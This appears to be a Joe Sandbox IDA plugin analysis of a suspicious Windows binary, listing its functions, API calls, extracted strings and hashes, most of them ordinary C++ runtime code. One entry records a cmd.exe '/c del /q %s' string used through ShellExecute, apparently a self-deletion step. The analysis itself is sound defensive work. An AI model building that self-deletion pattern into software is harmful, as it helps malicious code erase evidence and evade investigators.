                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentPriorityProcessThread$ChangeClassExecuteExitNotifyShell_fread_fwprintf
                                                                              • String ID: /c del /q %s$cmd.exe$open
                                                                              • API String ID: 809167050-3932901086
                                                                              • Opcode ID: 3960363030775da73cc876d0f0792134f2a1bf647d3d82fa4617f52eeab43870
                                                                              • Instruction ID: d975c6d1b977ba4cb48d8fe462f36f19b4ce3aef2a2278d111170cc1d7de76f5
                                                                              • Opcode Fuzzy Hash: 3960363030775da73cc876d0f0792134f2a1bf647d3d82fa4617f52eeab43870
                                                                              • Instruction Fuzzy Hash: A9F04975A80304BFE311A7E19D0FFB9372CAB88B02F400454B309A91E1CEF4558CEB62
                                                                              APIs
                                                                              • IsInExceptionSpec.LIBVCRUNTIME ref: 00EDCDB5
                                                                              • type_info::operator==.LIBVCRUNTIME ref: 00EDCDD7
                                                                              • ___TypeMatch.LIBVCRUNTIME ref: 00EDCEE6
                                                                              • IsInExceptionSpec.LIBVCRUNTIME ref: 00EDCFB8
                                                                              • _UnwindNestedFrames.LIBCMT ref: 00EDD03C
                                                                              • CallUnexpected.LIBVCRUNTIME ref: 00EDD057
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                              • String ID: csm$csm$csm
                                                                              • API String ID: 2123188842-393685449
                                                                              • Opcode ID: 5270676d37fa7463d93eb49ab777fd3d3616ab7b32e4fe6affc2ffda981b4229
                                                                              • Instruction ID: 10904aa7e71d5167dc7cc15ae674affe5fa428210e7363dafc09a4801919af2d
                                                                              • Opcode Fuzzy Hash: 5270676d37fa7463d93eb49ab777fd3d3616ab7b32e4fe6affc2ffda981b4229
                                                                              • Instruction Fuzzy Hash: 8CB1477190020AEFCF25DFA8C8819AEBBB6FF44354B24516AE8157B312D731DA53CB91
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: Yarn$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                              • String ID: bad locale name
                                                                              • API String ID: 3904239083-1405518554
                                                                              • Opcode ID: 3c7a8f026297f7f5841ee1623d0955e10f96d2fb3c2827b20bd9611479ad2007
                                                                              • Instruction ID: e79bf89fb09c5b8a1e44e70a49bd8827942631405eb37ec192aac252fcc96722
                                                                              • Opcode Fuzzy Hash: 3c7a8f026297f7f5841ee1623d0955e10f96d2fb3c2827b20bd9611479ad2007
                                                                              • Instruction Fuzzy Hash: E1116DB0A04249EFCB08EB98C955BAEB7B5FF10308F04555AE0123B3C2CB765A01C761
                                                                              APIs
                                                                              • std::ios_base::good.LIBCPMTD ref: 00ED6CD2
                                                                              • std::ios_base::getloc.LIBCPMTD ref: 00ED6D54
                                                                              • char_traits.LIBCPMTD ref: 00ED6DE8
                                                                              • std::ios_base::good.LIBCPMTD ref: 00ED6E7B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: std::ios_base::good$char_traitsstd::ios_base::getloc
                                                                              • String ID: L7$L7$]t
                                                                              • API String ID: 1920461149-3775809368
                                                                              • Opcode ID: d153dda6a2d2a6e9d4836cffc8ca026f8c5c1bd1550dbaf678448e416ca91ef9
                                                                              • Instruction ID: 992a26ca3b919e7e2bdb2aeca7dce51d880dee1ad416458b43e86e1de8aa45ac
                                                                              • Opcode Fuzzy Hash: d153dda6a2d2a6e9d4836cffc8ca026f8c5c1bd1550dbaf678448e416ca91ef9
                                                                              • Instruction Fuzzy Hash: 30513CB4E00209DFCB04DF94D892ABEBBB1FF45314F14515AE6127B391DB35A946CB90
                                                                              APIs
                                                                              • FreeLibrary.KERNEL32(00000000,?,00EE7BD5,00EDDD01,?,00000000,u,00000000,?,00EE7DFF,00000022,FlsSetValue,00EFBE90,00EFBE98,u), ref: 00EE7B87
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: FreeLibrary
                                                                              • String ID: api-ms-$ext-ms-$u
                                                                              • API String ID: 3664257935-2083697216
                                                                              • Opcode ID: 49de03d6f948ad93ec2e55c63f6f75f744068107274312185c4e3e4d3dc73dd4
                                                                              • Instruction ID: bca090761a34792d8c0881dfbc26bdbd67e5887b259bb7681a5b3e9c53f06223
                                                                              • Opcode Fuzzy Hash: 49de03d6f948ad93ec2e55c63f6f75f744068107274312185c4e3e4d3dc73dd4
                                                                              • Instruction Fuzzy Hash: 5421307260569CAFD7219F63DC40EAA7359EB41774F201160EE85B7290DF30ED05C6D0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: __freea$__alloca_probe_16$Info
                                                                              • String ID:
                                                                              • API String ID: 127012223-0
                                                                              • Opcode ID: 47df3083055277c090f4c1ee7354612e5e35908bc6c842d01d652dee68c91639
                                                                              • Instruction ID: 79fc309539608bd7112f4796d303c85d7ca4c25cb1be30506e34e2ba9e5ac777
                                                                              • Opcode Fuzzy Hash: 47df3083055277c090f4c1ee7354612e5e35908bc6c842d01d652dee68c91639
                                                                              • Instruction Fuzzy Hash: 5571D772A0424DABEF20AF548D42BBFB7F9FF45314F242059EA14B7292D7359C048760
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00ED9AAC
                                                                              • __alloca_probe_16.LIBCMT ref: 00ED9AD8
                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00ED9B17
                                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00ED9B34
                                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00ED9B73
                                                                              • __alloca_probe_16.LIBCMT ref: 00ED9B90
                                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00ED9BD2
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00ED9BF5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                              • String ID:
                                                                              • API String ID: 2040435927-0
                                                                              • Opcode ID: 4e0c03e6d99c598b658462bccf000a6301c3f0b2848b40160f9cdda5aa0a7c32
                                                                              • Instruction ID: f59f998b320c79d0e79a118ece1acec069054bfcdaee47b9686bef9f348097e3
                                                                              • Opcode Fuzzy Hash: 4e0c03e6d99c598b658462bccf000a6301c3f0b2848b40160f9cdda5aa0a7c32
                                                                              • Instruction Fuzzy Hash: 0B51DF7261020AAFEF208F65DC45FAF7BA9EF40748F154127F904B6292DB308D42CBA4
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: _strrchr
                                                                              • String ID:
                                                                              • API String ID: 3213747228-0
                                                                              • Opcode ID: 88fa05fee6af742072e9b0999c7c4b8006f620844c5ab2e84b20edb38d002f48
                                                                              • Instruction ID: 610fc8b7cf9d87dd0efacf0fcd3b115a38501e990be0b793f0cbf171d7045aa3
                                                                              • Opcode Fuzzy Hash: 88fa05fee6af742072e9b0999c7c4b8006f620844c5ab2e84b20edb38d002f48
                                                                              • Instruction Fuzzy Hash: 22B17772A003DE9FDB11CF29CD81BEE7BE5EF55314F246156E948BB282DA709901C7A0
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: char_traits
                                                                              • String ID:
                                                                              • API String ID: 1158913984-3916222277
                                                                              • Opcode ID: ebca0e1942a551dfc8631ab79acf78a253ca554bbcfc03fc8e05bf69d126a1b1
                                                                              • Instruction ID: 42d2700493d1c14c0ecc6f41394126eddd9f2de2b4faf5ac6bc61d83c1dc1968
                                                                              • Opcode Fuzzy Hash: ebca0e1942a551dfc8631ab79acf78a253ca554bbcfc03fc8e05bf69d126a1b1
                                                                              • Instruction Fuzzy Hash: 6851B2F5D00118ABCB04EB94D4419EEBBB5EF64304F44A0ABE5527B381EB359A46CBA1
                                                                              APIs
                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00ED7CD0
                                                                              • int.LIBCPMTD ref: 00ED7CE9
                                                                                • Part of subcall function 00ED1E00: std::_Lockit::_Lockit.LIBCPMT ref: 00ED1E16
                                                                                • Part of subcall function 00ED1E00: std::_Lockit::~_Lockit.LIBCPMT ref: 00ED1E40
                                                                              • Concurrency::cancel_current_task.LIBCPMTD ref: 00ED7D29
                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00ED7D91
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                                              • String ID: O^
                                                                              • API String ID: 3053331623-1130408655
                                                                              • Opcode ID: 244c2839b2402f23b20ea5b387b9044c525da466aeb755f1296e91140f7a4eab
                                                                              • Instruction ID: 4c014645fedb3a0a0149f0d0f9a8e43fb1f4c25295ce1fb096bff443ae8a20d2
                                                                              • Opcode Fuzzy Hash: 244c2839b2402f23b20ea5b387b9044c525da466aeb755f1296e91140f7a4eab
                                                                              • Instruction Fuzzy Hash: 56314AB0D00209DBCB04EF94C991BEEBBB1FF58310F20565AE415B7391DB345A06CBA1
                                                                              APIs
                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00ED77B0
                                                                              • int.LIBCPMTD ref: 00ED77C9
                                                                                • Part of subcall function 00ED1E00: std::_Lockit::_Lockit.LIBCPMT ref: 00ED1E16
                                                                                • Part of subcall function 00ED1E00: std::_Lockit::~_Lockit.LIBCPMT ref: 00ED1E40
                                                                              • Concurrency::cancel_current_task.LIBCPMTD ref: 00ED7809
                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00ED7871
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                                              • String ID: (v
                                                                              • API String ID: 3053331623-234128963
                                                                              • Opcode ID: d2e06d371c07b9701a6ddd17719b5cdb1827a2dbc3839774c418f8b6882e27e1
                                                                              • Instruction ID: d793fe15a40c345f99dade795c6bf6833b5bd11aa867f573ee77f6bda3503cc0
                                                                              • Opcode Fuzzy Hash: d2e06d371c07b9701a6ddd17719b5cdb1827a2dbc3839774c418f8b6882e27e1
                                                                              • Instruction Fuzzy Hash: 80314B74D04209DBCB04DF94D981BEEBBB0FF48310F20562AE511B7391DB345A42CBA1
                                                                              APIs
                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,9B965E69,u,?,00000000,00EF7613,000000FF,?,00EE35D2,?,?,00EE35A6,?), ref: 00EE366D
                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00EE367F
                                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,00EF7613,000000FF,?,00EE35D2,?,?,00EE35A6,?), ref: 00EE36A1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                              • String ID: CorExitProcess$mscoree.dll$u
                                                                              • API String ID: 4061214504-501404622
                                                                              • Opcode ID: 3a2e06aea4ae39078297a2f1afe243f0525674d4748957d72ed12fcada55584c
                                                                              • Instruction ID: 3edc8b0b243006e1ba8cf3d8374c3e7b8995506dda3561f04bd181d3dddd0e90
                                                                              • Opcode Fuzzy Hash: 3a2e06aea4ae39078297a2f1afe243f0525674d4748957d72ed12fcada55584c
                                                                              • Instruction Fuzzy Hash: FA01A232A44759BFDB119F61CC09BBFBBB8FB44B15F000629E911B2290DF749904CB80
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: Fgetc
                                                                              • String ID:
                                                                              • API String ID: 1720979605-0
                                                                              • Opcode ID: 66bdcb76f1d3fa96745b398fe5f098cb91a17b54f7f71b50d981efdaa2abc47b
                                                                              • Instruction ID: 375ff309c3060f02b240d2940b86af2dc4b3e4786d5f3f58c417bf03788e2a82
                                                                              • Opcode Fuzzy Hash: 66bdcb76f1d3fa96745b398fe5f098cb91a17b54f7f71b50d981efdaa2abc47b
                                                                              • Instruction Fuzzy Hash: 7E6150B1C001099FCB14EBE4D9829EEB7B4EF14315F60622AE5127B3D5EB355E06CBA1
                                                                              APIs
                                                                              • GetLastError.KERNEL32(?,?,00EDC941,00EDB091,00EDA5CA), ref: 00EDC958
                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00EDC966
                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00EDC97F
                                                                              • SetLastError.KERNEL32(00000000,00EDC941,00EDB091,00EDA5CA), ref: 00EDC9D1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastValue___vcrt_
                                                                              • String ID:
                                                                              • API String ID: 3852720340-0
                                                                              • Opcode ID: b44c94738d29880ca70ad7062a41479d36def9b5eba0a5b766e7c89455f294c0
                                                                              • Instruction ID: d60ee0fbd72e37bee684163fab2ed51a6ea2130c8e521ea07192aba63c109f6c
                                                                              • Opcode Fuzzy Hash: b44c94738d29880ca70ad7062a41479d36def9b5eba0a5b766e7c89455f294c0
                                                                              • Instruction Fuzzy Hash: 5F01243320D3126EE6A526757C95A667684EB813BC730232BF010B53F0EF212C0BE144
                                                                              APIs
                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00EDDAA3,?,?,00F085C4,00000000,?,00EDDBCE,00000004,InitializeCriticalSectionEx,00EF9C0C,InitializeCriticalSectionEx,00000000), ref: 00EDDA72
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: FreeLibrary
                                                                              • String ID: api-ms-
                                                                              • API String ID: 3664257935-2084034818
                                                                              • Opcode ID: 6933a086b697e673158c0785b0add6d7171147520d2df97249c3c7e3fff94bb6
                                                                              • Instruction ID: 68f55ab38b11176325a334f4043fb5d8830dfab0743117772c1ca63189b40928
                                                                              • Opcode Fuzzy Hash: 6933a086b697e673158c0785b0add6d7171147520d2df97249c3c7e3fff94bb6
                                                                              • Instruction Fuzzy Hash: BE11E332A0C625EBDF228B689C00B6A3398EB01774F249112E914FB380DE70ED06C6D4
                                                                              APIs
                                                                              • __alloca_probe_16.LIBCMT ref: 00EEB322
                                                                              • __alloca_probe_16.LIBCMT ref: 00EEB3EB
                                                                              • __freea.LIBCMT ref: 00EEB452
                                                                                • Part of subcall function 00EE824E: RtlAllocateHeap.NTDLL(00000000,00EEE6D6,00000000,?,00EEE6D6,00000220,?,?,00000000), ref: 00EE8280
                                                                              • __freea.LIBCMT ref: 00EEB465
                                                                              • __freea.LIBCMT ref: 00EEB472
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1423051803-0
                                                                              • Opcode ID: b0965b0f12b18575ee614d4688034a9f0bf44f9f1cbb77e7de164dfcfe7fcb44
                                                                              • Instruction ID: 0580e5183458431d9626e950a24410391eca413b9ebd850ed0e5e658c2925acb
                                                                              • Opcode Fuzzy Hash: b0965b0f12b18575ee614d4688034a9f0bf44f9f1cbb77e7de164dfcfe7fcb44
                                                                              • Instruction Fuzzy Hash: 5A51B17260029EABEF205F629C81EBB76ADEF44714F196529BD14F62A6F730CC10C660
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: char_traits
                                                                              • String ID:
                                                                              • API String ID: 1158913984-0
                                                                              • Opcode ID: 479bd20052fa9b755961ea426f786315222a3e58f121c850a8bdd67ed70cee08
                                                                              • Instruction ID: 569f35ead2fcdede278b9ead9be8b5ba435a806d69500668702edea85f96231d
                                                                              • Opcode Fuzzy Hash: 479bd20052fa9b755961ea426f786315222a3e58f121c850a8bdd67ed70cee08
                                                                              • Instruction Fuzzy Hash: 0631B5F5D00119ABCB04EBA4D8519EE77B5EF60305F04A07BE546BB382EB319A47CB91
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd
                                                                              Similarity
                                                                              • API ID: char_traitsctypestd::ios_base::good
                                                                              • String ID: L7$]t
                                                                              • API String ID: 3503515737-1523685022
                                                                              • Opcode ID: 7ee9ec8653e08cc9b582632a6e2ba0144898d9cde8d6a7188fa55776e734af8e
                                                                              • Instruction ID: c410d8db5fc3ec62162415044582f7c6866f02f317f12c81141b4e7413731fb7
                                                                              • Opcode Fuzzy Hash: 7ee9ec8653e08cc9b582632a6e2ba0144898d9cde8d6a7188fa55776e734af8e
                                                                              • Instruction Fuzzy Hash: 2511EC75E05209DBCB08DF94D5A2ABEBBB1EF44314F14515BE6127B351CB30A946CB90
                                                                              APIs
                                                                              • GetConsoleOutputCP.KERNEL32(9B965E69,00000000,00000000,?), ref: 00EE686E
                                                                                • Part of subcall function 00EED831: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00EEB448,?,00000000,-00000008), ref: 00EED892
                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00EE6AC0
